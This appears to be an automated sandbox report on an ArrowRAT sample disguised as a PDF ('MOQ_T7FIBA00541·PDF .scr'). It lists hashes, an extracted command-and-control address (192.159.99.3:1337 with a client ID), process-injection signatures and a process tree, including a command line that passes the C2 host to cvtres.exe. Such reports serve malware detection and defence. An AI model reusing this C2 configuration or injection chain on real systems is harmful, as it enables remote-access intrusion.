Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
13-09-2023 22:07
Static task
static1
Behavioral task
behavioral1
Sample
MOQ_T7FIBA00541·PDF .scr
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
MOQ_T7FIBA00541·PDF .scr
Resource
win10v2004-20230831-en
Behavioral task
behavioral3
Sample
ORDER LIST_SEPT7FIBA00541·PDF.scr
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
ORDER LIST_SEPT7FIBA00541·PDF.scr
Resource
win10v2004-20230831-en
General
-
Target
MOQ_T7FIBA00541·PDF .scr
-
Size
670KB
-
MD5
48a5e2b45923213e94a82d30db1eb988
-
SHA1
eb3c3aeb61e6e20b149cbd966f60c81a8215e8b0
-
SHA256
19fa9896468d7dd79d76fa27b34f66e13b6c5268cdd574c0a78eeb0e3dbeb839
-
SHA512
13edc7b141a8bd854a07ec70371f6fe59055d1dfe4127e3912992181d983e710f990d0cfcaa294e5da8e37ab757efb93133382625e210c47823885586fc536da
-
SSDEEP
12288:PBzhfOS3GXJNUwCpoOekXOS6zjwehALsCGlhcBd:phfOS3sJWwvOeYCras
Malware Config
Extracted
arrowrat
Client
192.159.99.3:1337
qawNWRCCU
Signatures
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2188 set thread context of 2520 2188 MOQ_T7FIBA00541·PDF .scr 36 PID 2520 set thread context of 2524 2520 aspnet_compiler.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 2144 ipconfig.exe 2992 ipconfig.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2520 aspnet_compiler.exe 2520 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2520 aspnet_compiler.exe Token: SeShutdownPrivilege 2504 explorer.exe Token: SeShutdownPrivilege 2504 explorer.exe Token: SeShutdownPrivilege 2504 explorer.exe Token: SeShutdownPrivilege 2504 explorer.exe Token: SeShutdownPrivilege 2504 explorer.exe Token: SeShutdownPrivilege 2504 explorer.exe Token: SeShutdownPrivilege 2504 explorer.exe Token: SeShutdownPrivilege 2504 explorer.exe Token: SeShutdownPrivilege 2504 explorer.exe Token: SeShutdownPrivilege 2504 explorer.exe Token: SeShutdownPrivilege 2504 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe -
Suspicious use of SendNotifyMessage 18 IoCs
pid Process 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2520 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 2188 wrote to memory of 2104 2188 MOQ_T7FIBA00541·PDF .scr 28 PID 2188 wrote to memory of 2104 2188 MOQ_T7FIBA00541·PDF .scr 28 PID 2188 wrote to memory of 2104 2188 MOQ_T7FIBA00541·PDF .scr 28 PID 2188 wrote to memory of 2104 2188 MOQ_T7FIBA00541·PDF .scr 28 PID 2104 wrote to memory of 2144 2104 cmd.exe 30 PID 2104 wrote to memory of 2144 2104 cmd.exe 30 PID 2104 wrote to memory of 2144 2104 cmd.exe 30 PID 2104 wrote to memory of 2144 2104 cmd.exe 30 PID 2188 wrote to memory of 2740 2188 MOQ_T7FIBA00541·PDF .scr 31 PID 2188 wrote to memory of 2740 2188 MOQ_T7FIBA00541·PDF .scr 31 PID 2188 wrote to memory of 2740 2188 MOQ_T7FIBA00541·PDF .scr 31 PID 2188 wrote to memory of 2740 2188 MOQ_T7FIBA00541·PDF .scr 31 PID 2740 wrote to memory of 2992 2740 cmd.exe 33 PID 2740 wrote to memory of 2992 2740 cmd.exe 33 PID 2740 wrote to memory of 2992 2740 cmd.exe 33 PID 2740 wrote to memory of 2992 2740 cmd.exe 33 PID 2188 wrote to memory of 2520 2188 MOQ_T7FIBA00541·PDF .scr 36 PID 2188 wrote to memory of 2520 2188 MOQ_T7FIBA00541·PDF .scr 36 PID 2188 wrote to memory of 2520 2188 MOQ_T7FIBA00541·PDF .scr 36 PID 2188 wrote to memory of 2520 2188 MOQ_T7FIBA00541·PDF .scr 36 PID 2188 wrote to memory of 2520 2188 MOQ_T7FIBA00541·PDF .scr 36 PID 2188 wrote to memory of 2520 2188 MOQ_T7FIBA00541·PDF .scr 36 PID 2188 wrote to memory of 2520 2188 MOQ_T7FIBA00541·PDF .scr 36 PID 2188 wrote to memory of 2520 2188 MOQ_T7FIBA00541·PDF .scr 36 PID 2188 wrote to memory of 2520 2188 MOQ_T7FIBA00541·PDF .scr 36 PID 2520 wrote to memory of 2504 2520 aspnet_compiler.exe 37 PID 2520 wrote to memory of 2504 2520 aspnet_compiler.exe 37 PID 2520 wrote to memory of 2504 2520 aspnet_compiler.exe 37 PID 2520 wrote to memory of 2504 2520 aspnet_compiler.exe 37 PID 2520 wrote to memory of 2524 2520 aspnet_compiler.exe 38 PID 2520 wrote to memory of 2524 2520 aspnet_compiler.exe 38 PID 2520 wrote to memory of 2524 2520 aspnet_compiler.exe 38 PID 2520 wrote to memory of 2524 2520 aspnet_compiler.exe 38 PID 2520 wrote to memory of 2524 2520 aspnet_compiler.exe 38 PID 2520 wrote to memory of 2524 2520 aspnet_compiler.exe 38 PID 2520 wrote to memory of 2524 2520 aspnet_compiler.exe 38 PID 2520 wrote to memory of 2524 2520 aspnet_compiler.exe 38 PID 2520 wrote to memory of 2524 2520 aspnet_compiler.exe 38 PID 2504 wrote to memory of 1700 2504 explorer.exe 40 PID 2504 wrote to memory of 1700 2504 explorer.exe 40 PID 2504 wrote to memory of 1700 2504 explorer.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\MOQ_T7FIBA00541·PDF .scr"C:\Users\Admin\AppData\Local\Temp\MOQ_T7FIBA00541·PDF .scr" /S1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release2⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /release3⤵
- Gathers network information
PID:2144
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /renew3⤵
- Gathers network information
PID:2992
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\system32\ctfmon.exectfmon.exe4⤵PID:1700
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 192.159.99.3 1337 qawNWRCCU3⤵PID:2524
-
-